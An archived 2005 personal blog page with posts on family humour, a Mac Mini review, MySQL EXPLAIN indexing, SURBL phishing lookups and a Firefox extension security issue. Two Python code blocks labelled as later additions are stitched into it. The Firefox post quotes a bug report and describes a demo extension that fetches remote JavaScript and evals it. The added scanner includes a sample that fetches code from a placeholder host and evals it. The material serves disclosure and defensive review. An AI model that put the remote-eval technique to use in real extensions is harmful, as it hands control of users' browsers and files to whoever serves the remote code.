Archive for February, 2005

In Case of Divorce

February 27th, 2005 by daryl

Mleeka and I aren’t getting a divorce. We’re not even close. But occasionally, we’ll playfully suggest that if X, then I might have to pack up Lennie and go. It’s a joke. If you know us, don’t worry. So yesterday, Mleeka did the usual divorce joke, and Lennie and I worked out a deal that I think may have cinched her decision to go with me instead of with Mleeka.

First, we have to start weaning her off the magic boobies that fix any catastrophe, large or small. They’re definitely a must-have for now, and my proposition is essentially null until after the magic boobies are a luxury rather than an essential.

Once we clear that hurdle, we’ve decided to live in candy houses. At any given time, we’ll have six candy houses and a partial. We’ll build seven initially, and they’ll all be in a line, but Lennie will start munching the first as soon as we move in. The next day (I predict that Lennie will have a voracious appetite for candy), we’ll move into the next one in line because Lennie will have reduced the first to a shambles. Meanwhile, we’ll begin building another beyond the last one in the line. The next day, we’ll move into the next one and will build another. The end result, of course, will be that we’ll always have a yummy candy house and will get to travel the country together, but never with any great big single move that would be a hardship on Lennie from the vantage point of making friends, etc.

When I proposed this to her, she grunted and giggled and tried to eat my hand, and all of these things seemed to me to suggest that she dug the idea, so I think we’re a go if the need ever arises.

The Command Center

February 27th, 2005 by daryl

[Image: The Command Center]

When I started my new job, I revamped my home office, which had been home to a rickety desk and stacks of books and papers all over the floor. For under $500, I got a big L-desk, a nice speaker phone, a printer stand, two beautiful wooden file cabinets, and a 6-foot bookshelf. I’ve got a pretty swank work space now. At my last job, people always joked that I was at sort of a Star-Trekkish command center because I had a flat screen monitor hooked into a Belkin port switcher that allowed me to use both a PC and my main Linux machine with just the one monitor/keyboard/mouse. I also had my laptop set up there, and all three systems were plugged into a little hub so that they could all get network from my one wall jack.

At home too I’ve got a little command center, with the laptop, a Linux box managing printing and poor-man’s samba backups under the desk, and a brand new Mac Mini sitting — get this — on my keyboard tray. The Mac is the newest addition and is a definite departure from the usual routine for me. I’ve been using Linux as a desktop OS for a couple of years and as a server platform for about five years, and I avoid PCs whenever remotely possible. Until this week, I had hardly touched a Mac in more than six years, when I did desktop support at UNC; we were on OS 7.x back then, and there have been a lot of changes. Some of my impressions about the Mac experience follow.

Setup. The system worked out of the box. Being a Linux user, I’m not exactly used to this. It took me a week of frustration to get the wireless, Synaptics touch pad, and wide screen monitor on my current laptop to work under Fedora Core 3. So I plugged in my Mac and it just worked. Today, I plugged my camera into a USB port to download the picture of the office, and as soon as I plugged it in, iPhoto started up and offered to download the images. No setup, none of the mounting of devices that I’m used to doing in Linux, no irritating system tray bubble telling me that a new device had been found and to click if I wanted more info.

Aesthetics. The Mac is a beautiful thing. Some of the default UI for applications like Safari that looks sort of like brushed metal I could do without, but the general tendency on the Mac is toward beauty. Smooth fades and slides as applications change state (focused or not), transparency of the docking bar, the crispness of the icons: These are all nice touches that make the OS a joy to use. Linux should aspire to the Mac aesthetic.

Speed. It may just be that I don’t have enough RAM (256M), but my Mac feels a little sluggish. Every Mac I’ve ever worked on felt a little slow to respond to things. There was a time when Windows felt to me like it had the fastest-responding and most crisp UI going. Then XP with all its bloat and sluggishness came along, and newer versions of Linux came along that, to my mind, in most applications, topped Windows. My experience so far is that my Linux laptop is faster to work with than the Mac (part of the reason I write this from the laptop). Even with only 7MB of its 384MB free right now, my laptop is responding more quickly than the Mac, which has 62MB free.

Installing Applications. Installing applications on Windows has long been a strong point, I think. You click a setup file, and a wizard guides you through all the steps necessary to complete the installation. More and more Linux apps have a similar install procedure, though I find it about as easy to go to a command line and execute the few commands required to install most software packages (which process also happens to make you look really smart and dorky to bystanders, who watch with fascination as lines and lines of gobbledegook scroll up your screen). On the Mac, you download an install file, click it, and drag an icon from the resulting window into your Applications folder. If you launch the application straight from the icon, it sticks a drive icon for the app on your desktop, and this was sort of confusing at first, but once I figured out what was going on, I found this install process to be pretty intuitive. I suppose it lets you try an application before actually cluttering up your applications folder with it.

[Image: Exposé]

Finding Stuff. I’ve never found finding things on the Mac to be especially intuitive, though I guess it’s similar to the process on a Windows system. There’s always been this sort of abstract thing called the Finder that hasn’t seemed to be very useful. I’d expect to find here a list of open applications that allows me to toggle from app to app (it seems like this may have been part of the functionality years ago). OSX does have, I just now discovered, alt-tab functionality that allows you to toggle among open applications. When I last used a Mac with any regularity, I doubt I even knew about this feature on Windows systems. Again, the aesthetics of even this little piece of functionality are beautiful, with transparency, nice big icons, rounded corners, and a fade effect when it disappears. What the Mac does have now is a dock that displays pretty clearly what applications you use most frequently, which ones are open, and which ones you’ve minimized. The dock can be moved to either side or the bottom of your screen, and you add things to it by dragging to it, removing them by dragging them to the trash. As far as finding files, there’s a find dialogue, but because OSX has FreeBSD running under the hood, you can also use standard find syntax (“find /Users -name office.jpg”) at the command line. All in all, though the ways of getting at applications and files on the Mac are a little different from what I’m used to, I could get used to it and haven’t found it to be a problem. One really cool feature the Mac ships with is Exposé; if you hit F9, all your open applications are tiled nicely on your screen so that you can see what’s running and click the window you want to give focus to. This sort of replaces the Windows/Linux task bar feature that labels each window for you, and it’s actually much better because it gives you a visual representation rather than text in your taskbar, of which text less and less is visible as you open more and more things.

[Image: The Mac's dock]

Window Size. This is the biggest strike against the Mac, in my opinion, and it may well be that there’s a setting that lets you get around it. Mac windows have three little bubbles in the upper left-hand corner, a red, a yellow, and a green one. Clicking the red one closes a window or application. Clicking the yellow one minimizes it (which on the Mac makes it disappear from the screen and puts an icon in a separated area of the dock). Clicking the green one seems to maximize the width of the window and to extend the bottom border down to the top of the dock; clicking it again toggles back to the original view. I happen to be greedy for window space. I want my windows to take up the full window so that I can maximize my viewing space. This is especially important in text editors, such as vi, that I use to write code; I need all the horizontal and vertical space I can get so that I can read the maximum possible amount of code. Windows and Linux have spoiled me in this regard because their windows automatically expand to use all space but the sliver of task bar. The dock on the Mac is pretty big, and I lose nearly an inch of vertical space at the bottom of my 17-inch monitor and another quarter inch at the top even when I maximize. Now there are options associated with the dock. You can make it pretty small, and you can set it to disappear when you’re not moused over the area it’s set to occupy. When you set it to disappear, maximizing windows works pretty much as it does under Windows and Linux. But here the aesthetics and the simple functionality of the dock foil you. First off, the dock is a gorgeous piece of UI, and I hate to see it go. Second off, it’s functional insofar as it displays up arrows under each open application and displays in a section on the right which apps are minimized. Additionally, if an application needs your attention (as when somebody tries to initiate a chat in iChat), the application’s icon bounces. So it’s a very functional piece of UI as well, and it’s reassuring to have it down there. I suppose there’s really not a win here. It’s just a matter of personal preference, and I can’t really fault Apple for providing me various options that I’m too finicky to combine in a fully pleasing way. Let’s not call this a strike against the Mac so much as a conundrum its elegance causes that the lack of much in the way of choice in Linux and Windows makes all the more painful.

Administration. I spent probably an hour off and on yesterday trying to get Mleeka’s Windows system to connect to my samba server. I got it to connect, but it didn’t have write access. I finally did get it to use the samba server for printing. But it was a major headache and involved much swearing and waiting for sluggish Windows UI and network, and I finally gave up on the file sharing part. If I knew how to administer a Windows system using simple command line utilities and configuration files, I would have been much happier. Linux is by and large a cinch to admin because it’s simple. There are graphical tools for administering the Mac, but if I ever get lost or frustrated, I can, in many cases, open up a terminal window and find myself at the familiar command line, where I can do simple administration with no headache. To connect my Mac to my samba server, I had only to type “/sbin/mount_smbfs -T 10 //username:password@192.168.1.102/photos /Users/photos” and I was connected, with a drive on my desktop and full read/write capability.

By and large, I’m digging my Mac so far. I ordered the iSight camera, which facilitates pretty darned high-quality video-conferencing with other iChat users who have the camera. That is in fact the primary reason my company bought me the computer. If the system were a little faster, I’d be more inclined to use it as my primary system. Also, if there were more open source software for it that could be installed reasonably easily (maybe there is and I just don’t know about it yet), I’d be happier. I considered trying to install Gimp yesterday because I don’t know of any more advanced free graphical editors for the Mac and because I’m comfortable using Gimp, but it was going to be a real pain, so I didn’t. I haven’t even looked to see if Open Office is supported on the Mac. If it is, I’ll definitely install that. If you’ve got some cash burning a hole in your pocket and are intrigued by Macs, I’d definitely recommend trying one out, especially if you’re tired of Windows but reluctant to toss yourself into the wilds of Linux.

Big Media Win for Firefox

February 26th, 2005 by daryl

I have a stack of 10 or so issues of Reader’s Digest on the back of my toilet. Last night, intrigued by a table-of-contents blurb about protecting your data, I flipped to a section called “RD Technology” and read, among others, the following recommendation:

Change Web Browsers
Viruses that enter your PC via Internet Explorer can do serious damage, says [an unidentified] Poor. He recommends you consider trying a free alternative such as Firefox, available at mozilla.org.

WP Upgrade

February 24th, 2005 by daryl

I decided to go ahead and upgrade my WordPress to 1.5. This is driven partially by reports that my Amazon plugin quit working in 1.5 and partially because I wanted to see if the comment spam measures were improved. Some time back, I essentially eliminated comment spam by adding captcha to my form, but the other day, I started getting hit with trackback spam. We’ll see if this works. It’s a pretty easy upgrade.

Amazon Plugin Ported to WP 1.5

February 24th, 2005 by daryl

I’ve updated the Amazon plugin to work with WordPress 1.5. The plugin uses a class called “Snoopy” to connect to Amazon, and this, it turns out, has been added as a class in the core WordPress code. So when I redefined it in my plugin, it was causing a problem with the Dashboard, which was trying to reinclude the class. The fix (thanks to George for beating me to the punch on diagnosing the problem and sending in a fix) can be downloaded here. The changes included deleting the Snoopy class definition and requiring snoopy-class.php from wp-includes.

Explaining SQL

February 24th, 2005 by daryl

I’m currently reading High Performance MySQL as part of an effort to compare MySQL and PostgreSQL. The book has proven most informative so far. Rather than just giving the basics of how to use MySQL, which I’m very familiar with, it goes into enhancing query performance and tweaking the server configuration to maximize what MySQL can do for you. Having been introduced to MySQL the way I was — by just jumping in as sort of a n00b programmer with no clue what I was really doing — these are the sorts of things I never found time, gumption, or particular need to learn. Most of the programs I wrote scaled pretty well (or had no need to scale) without a lot of performance tweaking. But for Spread Firefox and for my new job, I have written and will be writing some much higher-end stuff with scalability to hundreds of thousands of users in mind. So I figured it was time to read up on some of the more advanced topics in MySQL. Chapter 5 of High Performance MySQL, it turns out, is the most useful piece of geek writing I can recall ever having read. This chapter alone is worth the $40 price tag on the book (it’s actually only $26.37 through Amazon).

I read about half the book yesterday but didn’t get a chance to apply any of the takeaways in a real life situation. Today, I was glancing at some comments on sfx and saw someone asking that we reinstate the “Top 5 blog posts” block. I didn’t know it had gone away. Sure enough, though, the header was there, but no content existed. So I checked the query, and when I ran it, I got a query error, which seemed odd, as it had been working just recently, and I hadn’t changed the query. Ah, but we changed database servers, and the newer one had a newer version of MySQL. My query stupidly used the “mod” keyword as a table alias, and when I fixed that, the query error went away. But the query, which has always taken awhile because it’s calculating ratings for potentially thousands of posts and ordering them to get the top 100 (which I later apply another little algorithm to to get the top 5), took long enough that I interrupted it and decided I’d see if I could find a way to optimize it. When I say it took long enough, I don’t mean that it took three seconds rather than .0002; I mean that I killed it after 10 or 20 seconds.

To get an idea of just how MySQL optimizes and runs a given query, you use the “explain” keyword followed by the query you want to investigate. For each table the query has to hit, explain displays several pieces of information. Probably the easiest to zoom in on and the one that’ll be the most impressive for this example is how many rows the optimizer estimates it’ll have to read in order to get the results. In the output below, you’ll see that the query will have to look at 5602 rows in the “node_mod” table (aliased to “mymod” and formerly to the problematic “mod”; this table contains a list of which of the site’s posts have been moderated by users). This is a full table scan (I can tell this by looking at the “type” value and seeing “ALL”), which isn’t very efficient. For the “node_mod_users” table (aliased to “u” and listing the ratings given by each user to site posts), the optimizer estimates that it’ll have to scan 27081 rows. Again, this is a full table scan, which is less efficient the more rows you have. And finally, the “node” table (which contains posts) has one reference per iteration of the query. Here’s the output from explain:

mysql> explain SELECT node.nid, node.title, FROM_UNIXTIME(created) as date,
mymod.value as val, count(*) as cnt, (mymod.value/count(*)) as rating
FROM node, node_mod as mymod, node_mod_users as u
WHERE node.nid=mymod.nid
AND node.nid=u.nid AND created >= (UNIX_TIMESTAMP(NOW()) - (86400 * 7)) AND promote != 1 AND type != 'image'
GROUP BY node.nid ORDER BY rating DESC, created DESC LIMIT 100 \G

*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: mymod
         type: ALL
possible_keys: NULL
          key: NULL
      key_len: NULL
          ref: NULL
         rows: 5602
        Extra: Using temporary; Using filesort
*************************** 2. row ***************************
           id: 1
  select_type: SIMPLE
        table: u
         type: ALL
possible_keys: NULL
          key: NULL
      key_len: NULL
          ref: NULL
         rows: 27081
        Extra:
*************************** 3. row ***************************
           id: 1
  select_type: SIMPLE
        table: node
         type: eq_ref
possible_keys: PRIMARY,node_type,node_promote_status
          key: PRIMARY
      key_len: 4
          ref: spreadfirefox.mymod.nid
         rows: 1
        Extra: Using where
3 rows in set (0.01 sec)

The red flag this raised for me was that I shouldn’t have to do a full table scan on the node_mod table. It turns out that I hadn’t added an index on this table for the nid field, and by doing so, I eliminate in my query the need to do a full table scan. Sure enough, I added the index, and the query returns almost instantly now (in .44 seconds rather than too many seconds to even bother waiting). Take a look at the new explain output below. Rather than doing a full table scan of 5602 rows, we’re using the new index, and it has a significant positive effect on performance.

mysql> explain SELECT node.nid, node.title, FROM_UNIXTIME(created) as date,
mymod.value as val, count(*) as cnt, (mymod.value/count(*)) as rating
FROM node, node_mod as mymod, node_mod_users as u
WHERE node.nid=mymod.nid
AND node.nid=u.nid AND created >= (UNIX_TIMESTAMP(NOW()) - (86400 * 7)) AND promote != 1 AND type != 'image'
GROUP BY node.nid ORDER BY rating DESC, created DESC LIMIT 100 \G

*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: u
         type: ALL
possible_keys: NULL
          key: NULL
      key_len: NULL
          ref: NULL
         rows: 27079
        Extra: Using temporary; Using filesort
*************************** 2. row ***************************
           id: 1
  select_type: SIMPLE
        table: node
         type: eq_ref
possible_keys: PRIMARY,node_type,node_promote_status
          key: PRIMARY
      key_len: 4
          ref: spreadfirefox.u.nid
         rows: 1
        Extra: Using where
*************************** 3. row ***************************
           id: 1
  select_type: SIMPLE
        table: mymod
         type: ref
possible_keys: nid
          key: nid
      key_len: 5
          ref: spreadfirefox.node.nid
         rows: 1
        Extra: Using where
3 rows in set (0.10 sec)

After making this change and starting to write this triumphant blog entry, it occurred to me to check and see if I had indexed the node_mod_users table, and it turned out that I hadn’t. When I added an index on nid, it increased performance even more, cutting my query time down to .10 seconds and resulting in the following output from explain:

mysql> explain SELECT node.nid, node.title, FROM_UNIXTIME(created) as date,
mymod.value as val, count(*) as cnt, (mymod.value/count(*)) as rating
FROM node, node_mod as mymod, node_mod_users as u
WHERE node.nid=mymod.nid
AND node.nid=u.nid AND created >= (UNIX_TIMESTAMP(NOW()) - (86400 * 7)) AND promote != 1 AND type != 'image'
GROUP BY node.nid ORDER BY rating DESC, created DESC LIMIT 100 \G

*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: mymod
         type: ALL
possible_keys: nid
          key: NULL
      key_len: NULL
          ref: NULL
         rows: 5604
        Extra: Using temporary; Using filesort
*************************** 2. row ***************************
           id: 1
  select_type: SIMPLE
        table: node
         type: eq_ref
possible_keys: PRIMARY,node_type,node_promote_status
          key: PRIMARY
      key_len: 4
          ref: spreadfirefox.mymod.nid
         rows: 1
        Extra: Using where
*************************** 3. row ***************************
           id: 1
  select_type: SIMPLE
        table: u
         type: ref
possible_keys: nid
          key: nid
      key_len: 5
          ref: spreadfirefox.node.nid
         rows: 5
        Extra: Using where; Using index
3 rows in set (0.00 sec)

Note that the optimizer is once again doing a table scan of the roughly 5600 rows of node_mod. This is because MySQL can use only one index for a given query. In this case, with the nid column indexed in both node_mod and node_mod_users, it chooses the better of two options and does a table scan of the table with 5600 rows rather than the one with 27081. That’s 4 - 5 times fewer rows to scan, and our performance increased by a factor of about 4 (from .44 seconds to .10). Makes sense, huh?

The lesson here is pretty obvious. If you’ve got a slow query, explain it to see exactly how MySQL is processing it. Explain can expose, among other things, careless indexing problems that can make a very real difference in how your program executes.
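The same lesson can be reproduced without a MySQL server. The following is an added example, not code from the original post: it rebuilds the three tables from the post's query in SQLite (the sqlite3 module that ships with Python) with constructed rows, runs SQLite's EXPLAIN QUERY PLAN in place of MySQL's explain, and compares the plan before and after indexing the nid join columns. Table, alias and column names come from the post's query; the index names and the row contents are assumptions made for the example. SQLite says "SCAN <table>" where MySQL says type: ALL, and "SEARCH ... USING INDEX" where MySQL says type: ref.

```python
# Added example (not from the original post): the post's indexing lesson reproduced
# with SQLite's EXPLAIN QUERY PLAN standing in for MySQL's EXPLAIN.
import sqlite3

# The post's query with the MySQL-only pieces swapped for SQLite equivalents:
# strftime('%s', 'now') replaces UNIX_TIMESTAMP(NOW()); the raw timestamp is kept
# instead of FROM_UNIXTIME formatting.
TOP_POSTS = """
SELECT node.nid, node.title, node.created AS date,
       mymod.value AS val, COUNT(*) AS cnt, (mymod.value / COUNT(*)) AS rating
FROM node, node_mod AS mymod, node_mod_users AS u
WHERE node.nid = mymod.nid
  AND node.nid = u.nid
  AND node.created >= (strftime('%s', 'now') - (86400 * 7))
  AND node.promote != 1 AND node.type != 'image'
GROUP BY node.nid
ORDER BY rating DESC, node.created DESC
LIMIT 100
"""


def build_db(posts=200, ratings_per_post=5):
    """In-memory database with the post's three tables and, as in the post's starting
    state, NO index on the nid columns of node_mod and node_mod_users."""
    con = sqlite3.connect(":memory:")
    # SQLite would otherwise build a throw-away index for the join at run time;
    # switching that off keeps the plan comparable to the MySQL output in the post.
    con.execute("PRAGMA automatic_index = OFF")
    con.executescript("""
        CREATE TABLE node (nid INTEGER PRIMARY KEY, title TEXT, created INTEGER,
                           promote INTEGER, type TEXT);
        CREATE TABLE node_mod (nid INTEGER, value REAL);
        CREATE TABLE node_mod_users (nid INTEGER, uid INTEGER, score INTEGER);
    """)
    # Constructed sample rows: posts spread over the last two weeks, one moderation
    # value per post, and a handful of user ratings per post.
    now = int(con.execute("SELECT strftime('%s', 'now')").fetchone()[0])
    con.executemany("INSERT INTO node VALUES (?, ?, ?, ?, ?)",
                    [(i, "post %d" % i, now - (i % 14) * 86400,
                      1 if i % 10 == 0 else 0, "story")
                     for i in range(1, posts + 1)])
    con.executemany("INSERT INTO node_mod VALUES (?, ?)",
                    [(i, float(i % 7)) for i in range(1, posts + 1)])
    con.executemany("INSERT INTO node_mod_users VALUES (?, ?, ?)",
                    [(i, u, (i + u) % 5)
                     for i in range(1, posts + 1) for u in range(ratings_per_post)])
    con.commit()
    return con


def explain(con):
    """Plan steps for TOP_POSTS as SQLite's 'detail' strings (column 3 of the output)."""
    return [row[3] for row in con.execute("EXPLAIN QUERY PLAN " + TOP_POSTS)]


def full_scan_steps(con):
    """Steps that read a whole table: SQLite's 'SCAN ...', MySQL's type: ALL."""
    return [step for step in explain(con) if step.startswith("SCAN")]


def add_nid_indexes(con):
    """The fix from the post: index the join column on both rating tables.
    Index names are the example's own choice."""
    con.executescript("""
        CREATE INDEX idx_node_mod_nid ON node_mod (nid);
        CREATE INDEX idx_node_mod_users_nid ON node_mod_users (nid);
    """)


if __name__ == "__main__":
    db = build_db()
    print("before indexing:", *explain(db), sep="\n  ")
    add_nid_indexes(db)
    print("after indexing:", *explain(db), sep="\n  ")
```

Before the indexes exist, every table that the planner cannot reach through node's primary key is a SCAN step nested inside the outer loop, which is exactly the repeated full scan the post saw on node_mod_users. After add_nid_indexes, only the driving table is scanned and the other two are reached with SEARCH ... USING INDEX; as the post notes, one table in a join always has to be walked, so the goal is to make that the small one.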

Prawnography and Firefox Exploitability

February 22nd, 2005 by daryl

A few months ago, I created the following bug report at the Mozilla project’s install of Bugzilla:

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0

It’s possible to use XMLHttpRequest to retrieve the text from a remote javascript file and then to eval that text and execute the javascript within a local scope. This circumvents the need to sign remote scripts and can be done without enabling UniversalXPConnect. In theory, one would simply suggest that application developers be careful not to write code that would execute arbitrary remote javascript, but this doesn’t account for malicious coders who might make extensions available, for example, and use them to tamper with the users’ machines. It may be that this is a jslib issue and not a Gecko issue, but I wasn’t sure where else to report it.

Reproducible: Always
Steps to Reproduce:
1. Install jstest package (attached).
2. Edit xul.js (in zip file), replacing the second parameter to the “save()” call to a local file on your system (or to a file that doesn’t exist yet in a writable directory).
3. Place xul.js (in zip file) on a remote server.
4. Edit the button in jstest.xul within package so that the parameter to “execute()” in the “oncommand” parameter points to the file created in step 2.
5. Run the package and press the button.
Actual Results:
A file is written to the local path specified in the remote script containing the text sent as the first parameter to the remote “save()” function.

Expected Results:
No unsigned remote javascript should be able to perform certain actions, such as local file operations.

In plain English, it means that installing Firefox extensions can be dangerous if you’re not very careful about what you install. When you install an extension, you’re giving full control of your browser to the developer who wrote the extension. In most cases, this’ll work out just fine, as most people who write extensions are writing utilities that they find useful and wanted to make available to others. But there’s always the jerk who ruins a good thing. Later in the bug report, I go back and forth with a key developer about whether or not this is in fact a bug. He concludes that it’s not. In short, if you agree to install an extension, you agree to take whatever pain or pleasure comes with installing that extension, and it’s a bad idea to install untrusted extensions. And of course he’s right. The extension system has to have pretty much full privileges or else it’ll be rendered essentially useless. So the credibility of Firefox as a secure browser is in some ways in the hands of users, who are known for installing spyware on their systems through IE and can’t really be trusted to keep security in mind.

To illustrate the point, I’ve written a little test extension named Prawn (as in shrimp) that shows you prawnography on demand. The real life example, of course, would showcase pornography and would be more fully-featured than my extension. Prawn adds an item to your “Tools” menu named “Prawn me” that, when selected, spawns a new tab loaded with a random racy image from prawnography.net. The extension also has an annoying habit of popping up a window every 30 seconds or so. It’s ok to download and try my extension — I promise it doesn’t do anything truly malicious, and it shows the point pretty well, I think. If you happen to be a prawn fetishist and you see this great extension that gives you access to prawnography, you might carelessly download this extension and find yourself stuck with annoying popups. Moreover, if the popups don’t indicate that they’re associated with the Prawn extension, you might not be able to figure out how to make them stop, short of reinstalling Firefox (though all it in fact takes is uninstalling the extension).

The real dirty thing about my extension is that it doesn’t merely do a popup. It in fact downloads a remote text file and evaluates the code in that file as javascript. So a particularly sneaky developer could write an extension that, the first few days it’s loaded, does expected and harmless things but that begins after a while to do popups or other unsavory things (writing files to your system, for example, or sending cookies or information about your browsing habits back to a central server). This method renders it more difficult to associate the activities with the extension in question. My little Prawn extension effectively gives complete control of your browser to me. I could program it to close your browser upon startup so that you never even have the chance to uninstall it (unless you know what text files to edit by hand to do so). Can anybody see Microsoft covertly putting out a similar extension in order to frustrate Firefox users and drive them back to IE? The really scary thing is that because the extension executes remote code, I can change its behavior at any time I want without your having to modify your local copy; so it can start out as a friendly extension and morph into something ugly and destructive.

The moral here isn’t that Firefox is bad or insecure, though the argument could be made. I’ve spoken to Firefox developers who point out that the extensions manager instructs users not to install untrusted extensions, and I suppose that’s valid, though we all know that it’s absurd to trust users to follow instructions. (In spite of my warnings about not installing untrusted extensions, did you download and install mine? If so, shame on you. It really is safe, but what if somebody else wrote a similar blog posting with their own extension that actually turned out to be malicious?) Developers and advocates also point out that one of Firefox’s big strengths is that it doesn’t run ActiveX controls, which are responsible for most of the malware that’s out there. And that’s true and good. But if a similarly exploitable technology is built into Firefox, is it really that much better?

Well, I think it is. I’m a devoted Firefox user, and I encourage everybody I can to use the browser. But I also encourage them to be sensible about what extensions they add to Firefox. Theoretically, the extensions available at update.mozilla.org are safe, but I don’t know how much scrutiny is actually given to extensions before they’re added there. (There may be a great deal of scrutiny; I’m not saying there’s not; I’m just saying that I don’t know.) And I don’t know how much code review is done. Is it possible, I wonder, to submit and have approved a cool extension but then to go back and edit it without review a few months later so that it includes malicious code?

Questions like this are no doubt being asked as the Mozilla Foundation works even now on revamping update.mozilla.org, but they’re probably too technical and uninteresting to many, if not most, members of the growing pool of Firefox users. And debatably, they’re questions that users shouldn’t have to worry about. In an ideal world, you’d just install your browser and use it without looking back. The jerks out there who make malware will always find ways to thwart this ideal vision, I suspect. My advice, then, is to use Firefox (right now, it is safer than IE; if you don’t use Firefox, consider Opera or some other alternative). I also advocate spreading Firefox, an activity I’ve been engaged in for six months now. But don’t be blind to the shortcomings that the greatness of Firefox extensibility introduces. Try to verify that any extensions you install are safe. And whatever you do, if you need to browse prawnography, don’t use my extension to do so; you’ll find it most annoying, if (for now) technically harmless.
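The question of how much code review an extension gets is one that a reviewer can partly answer mechanically. Below is an added example, not code from the original post and not related to the Prawn extension: a small review-time scanner for extension JavaScript that finds eval and new Function calls and rates them "high" when the argument is built from an XMLHttpRequest response (the pattern described in the bug report above) and "review" otherwise. The two JavaScript snippets are constructed samples; the host and path in the second one are placeholders, and the single-hop taint tracking is a deliberately simple heuristic, not a full JavaScript parser.

```python
# Added example (not from the original post): a review-time heuristic that flags
# network-fetched text being passed to eval() in extension source.
import re

# Constructed sample: an eval() over a locally built string. Worth a second look,
# but nothing remote flows into it.
BENIGN_JS = """
var prefs = '{"interval": 30}';
var settings = eval('(' + prefs + ')');
"""

# Constructed sample of the pattern from the bug report: text fetched with
# XMLHttpRequest and handed to eval(). Host and path are placeholders.
REMOTE_EVAL_JS = """
var req = new XMLHttpRequest();
req.open("GET", "http://remote.example/update.txt", false);
req.send(null);
var payload = req.responseText;
eval(payload);
"""

EVAL_SINK_RE = re.compile(r"\b(eval|new\s+Function)\s*\(")
# name = expression;   (the negative lookahead keeps '==' from counting as assignment)
ASSIGN_RE = re.compile(r"\b([A-Za-z_$][\w$]*)\s*=(?!=)\s*([^;]+);")
IDENT_RE = re.compile(r"[A-Za-z_$][\w$]*")
NETWORK_MARKERS = ("XMLHttpRequest", "responseText", "responseXML")


def call_argument(source, open_paren):
    """Text between the '(' at open_paren and its matching ')'. Parentheses inside
    string literals are skipped so an argument like '(' + x + ')' is read whole."""
    depth, quote, i = 0, None, open_paren
    while i < len(source):
        ch = source[i]
        if quote:
            if ch == "\\":
                i += 1            # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return source[open_paren + 1:i]
        i += 1
    return source[open_paren + 1:]  # unbalanced source: return what is there


def tainted_names(source):
    """Identifiers assigned from a network response, directly or via another tainted
    identifier. Iterates until no new names are added (a small data-flow pass)."""
    tainted = set()
    changed = True
    while changed:
        changed = False
        for name, rhs in ASSIGN_RE.findall(source):
            if name in tainted:
                continue
            rhs_idents = set(IDENT_RE.findall(rhs))
            if any(marker in rhs for marker in NETWORK_MARKERS) or rhs_idents & tainted:
                tainted.add(name)
                changed = True
    return tainted


def scan(source):
    """One finding per eval / new Function call, with a severity and a reason."""
    tainted = tainted_names(source)
    findings = []
    for m in EVAL_SINK_RE.finditer(source):
        arg = call_argument(source, m.end() - 1).strip()
        arg_idents = set(IDENT_RE.findall(arg))
        remote = bool(arg_idents & tainted) or any(mk in arg for mk in NETWORK_MARKERS)
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "call": re.sub(r"\s+", " ", m.group(1)),
            "argument": arg,
            "severity": "high" if remote else "review",
            "reason": ("argument derives from a network response" if remote
                       else "dynamic code evaluation; confirm the input is local"),
        })
    return findings


if __name__ == "__main__":
    for label, src in (("benign sample", BENIGN_JS), ("remote-eval sample", REMOTE_EVAL_JS)):
        for f in scan(src):
            print("%s line %d: %s(%s) [%s] %s" % (label, f["line"], f["call"],
                                                  f["argument"], f["severity"], f["reason"]))
```

A heuristic like this cannot prove an extension safe (code can be obfuscated, or fetched by other means than XMLHttpRequest), but it does surface the one construct the post is about, which is the question a reviewer would want answered before and after every update to an extension.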

SURBL

February 21st, 2005 by daryl

It sounds like a belch you’re trying to suppress, but SURBL is actually a pretty cool spam/phish-blocking tool. I think “phishing” is probably a term familiar primarily to tech weenies, so I’ll give here the description provided at antiphishing.org: “Phishing attacks use ‘spoofed’ e-mails and fraudulent websites designed to fool recipients into divulging personal financial data such as credit card numbers, account usernames and passwords, social security numbers, etc.” In other words, all those emails you get from PayPal and Citibank and other financial organizations you have no affiliation whatsoever with telling you that you need to log in and provide your credit card number in order to avoid fraud are in fact from fraudulent sites. You can read more on phishing (and pretty much anything else) at WikiPedia.

Surbl.org provides a pretty cool system for testing whether or not sites are phishing sites. The system uses DNS to offload lookups onto an existing robust distributed network that’s pretty much never going to be down. This keeps surbl.org from having to maintain their own huge infrastructure to manage all the traffic they stand to get. The basic mechanism is that when you’ve found a possible phishing site (a link in a questionable email, for example), you prefix the domain to one of several possible surbl.org domains. For example, sc.surbl.org does a lookup against SpamCop’s blocklist database. Probably the most useful surbl.org domain is multi.surbl.org, which appears to aggregate results from all the lists. So for example, if I get an email with xxx.yyy.com listed as a domain, I’d do a lookup on xxx.yyy.com.multi.surbl.org. If the query returns an NXDOMAIN result, the domain’s not on any of the lists. If it returns an IP (it’ll be a 127.0.0.* IP), it’s on one of the lists and should be considered not fit for consumption. Of the following two queries I ran, the first isn’t listed as a phishing site, but the second one is:

[houston@localhost daryl.learnhouston.com]$ nslookup confirm.keydataonline.net.multi.surbl.org
Server:         69.1.30.34
Address:        69.1.30.34#53

** server can't find confirm.keydataonline.net.multi.surbl.org: NXDOMAIN

[houston@localhost daryl.learnhouston.com]$ nslookup 80.248.127.210.multi.surbl.org
Server:         69.1.30.34
Address:        69.1.30.34#53

Non-authoritative answer:
Name:   80.248.127.210.multi.surbl.org
Address: 127.0.0.12

If you’re testing an IP address (phishing emails often use these rather than domains but mask the IP in the status bar so that it actually looks to less savvy users as if the link is pointing to a valid site), you have to reverse the order of its octets before sending the query. The actual IP address that appeared in my email for the query above was 210.127.248.80.

Of course, this isn’t very practical or user-friendly. Even as a pretty savvy user, I’m not going to go do this query before reading each suspicious email (luckily, I have a pretty good nose for phish anyway), and, surely, less savvy users can’t be expected to use a tool like nslookup to do these queries. The info is provided really for those who would write tools to tap into it and make reading email safer. An enterprising programmer might write an extension for Thunderbird, for example, that does this lookup for any links in an email and changes the appearance of the email if a positive result is returned so that it’s obvious that the email is a phishing attempt.
